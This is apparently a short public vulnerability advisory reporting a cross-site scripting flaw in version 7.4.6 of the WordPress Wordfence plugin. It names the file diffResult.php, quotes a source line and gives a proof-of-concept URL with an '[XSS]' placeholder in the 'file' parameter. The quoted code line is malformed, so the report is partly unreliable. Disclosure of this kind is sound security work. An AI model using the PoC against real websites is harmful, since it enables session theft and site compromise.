WordPress Wordfence plugin version 7.4.6 suffers from a cross site scripting vulnerability.
4c4a19b487de18d919fa7c64af08c127[-] Title : word press plugin wordfence 7.4.6 - Cross-Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/wordfence/
[-] Tested on : Windows
[-] Category : Webapps
[-] Date : 2020-02-20
=====================================================================================================
Vulnerable page :
wordfence/lib/diffResult.php
======================================================================================================
Vulnerable Source :
19: echo echo wp_kses($_GET['file'], array()
=======================================================================================================
POC :
http://localhost/wp-content/plugins/wordfence/lib/diffResult.php?file=[XSS]
=======================================================================================================
************************
* ==> Contact With We :
* Telegram : @MF0584
* Email : [email protected]
************************